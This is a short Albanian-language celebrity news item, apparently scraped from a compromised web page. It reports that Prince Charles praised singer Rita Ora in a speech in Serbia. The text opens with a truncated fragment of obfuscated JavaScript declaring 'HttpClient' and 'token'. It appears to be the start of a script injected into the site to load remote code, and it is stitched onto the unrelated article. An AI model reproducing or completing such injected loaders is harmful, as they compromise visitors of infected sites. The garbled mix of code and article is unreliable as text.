;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Rita Ora ‘dridh’ parlamentin serb

By

Fama e saj tashmë ka bërë krenarë jo vetëm popullin shqiptar por edhe akterët më të lartë të politikës britanike.

Pak kohë më parë u bë e ditur se kryeministri David Cameroon ka një dosje me informata për këngëtaren si shembull i mirë nga populli i tij.

E Rita ka arritur të përmendet edhe në parlamentin serb, dhe kjo ka ndodhur nga besoni ose jo, hiq më pak se Princi Charles.

Ai gjatë vizitës zyrtare në shtetin serb, gjatë fjalimit ka përmendur këngëtaren me origjinë nga Kosova.

“Sot, njerëzit nga Ballkani janë të mirënjohur në Britani në shumë fusha: në muzikën bashkëkohore, Rita Ora, të cilën kam pasur kënaqësinë e madhe ta dëgjoj duke kënduar për here të pare në Londër javën e kaluar”, – ka thënë princi Charles.

Kujtojmë se nga mediat u raportua se edhe Rita do shoqëroj princin Charles në vizitën në Kosovë por deri tani, nuk ka asgjë zyrtare. /Prive.al/

Artikuj të ngjashëm